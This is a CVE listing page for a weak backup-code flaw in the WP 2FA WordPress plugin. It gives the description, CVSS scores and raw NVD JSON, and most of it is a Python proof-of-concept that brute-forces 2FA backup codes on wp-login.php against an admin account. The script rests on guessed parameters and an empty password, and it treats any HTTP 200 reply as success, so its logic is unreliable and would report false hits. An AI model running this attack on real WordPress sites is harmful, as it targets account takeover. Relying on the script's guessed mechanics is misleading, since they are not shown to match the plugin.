Security Vulnerability Report
中文
CVE-2025-12628 CVSS 6.3 MEDIUM

CVE-2025-12628

Published: 2025-11-24 13:16:01
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP 2FA WordPress plugin does not generate backup codes with enough entropy, which could allow attackers to bypass the second factor by brute forcing them

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP 2FA插件所有版本(需确认具体修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import itertools import string from concurrent.futures import ThreadPoolExecutor, as_completed # CVE-2025-12628 PoC - Backup Code Brute Force Attack # Target: WordPress site with WP 2FA plugin # Note: This PoC is for educational and authorized testing purposes only TARGET_URL = "http://target-wordpress-site.com" TARGET_USER = "admin" # Target username BACKUP_CODE_LENGTH = 8 # Typical backup code length CHARSET = string.digits # Assuming numeric backup codes def generate_backup_codes(): """Generate potential backup codes based on limited charset""" # Due to low entropy, backup codes are predictable # Generate all possible combinations for code in itertools.product(CHARSET, repeat=BACKUP_CODE_LENGTH): yield ''.join(code) def try_backup_code(session, code): """Attempt to authenticate with backup code""" login_url = f"{TARGET_URL}/wp-login.php" backup_auth_url = f"{TARGET_URL}/wp-login.php?action=2fa_backup" # Step 1: Login with username login_data = { 'log': TARGET_USER, 'pwd': '', # Leave empty for 2FA bypass '2fa_code': code, '2fa_backup': '1' } try: response = session.post(login_url, data=login_data, timeout=10) if 'success' in response.text.lower() or response.status_code == 200: print(f"[+] Valid backup code found: {code}") return code except: pass return None def main(): print(f"[*] Starting backup code brute force attack") print(f"[*] Target: {TARGET_URL}") print(f"[*] User: {TARGET_USER}") session = requests.Session() session.headers.update({'User-Agent': 'Mozilla/5.0'}) # Try to find valid backup code with ThreadPoolExecutor(max_workers=10) as executor: futures = {executor.submit(try_backup_code, session, code): code for code in itertools.islice(generate_backup_codes(), 10000)} for future in as_completed(futures): result = future.result() if result: print(f"[!] SUCCESS: Backup code {result} is valid!") print(f"[!] 2FA bypassed - attacker can now access the account") executor.shutdown(wait=False) break if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12628", "sourceIdentifier": "[email protected]", "published": "2025-11-24T13:16:01.223", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP 2FA WordPress plugin does not generate backup codes with enough entropy, which could allow attackers to bypass the second factor by brute forcing them"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/5e2d033c-dde6-4774-8588-cbe268c0d797/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.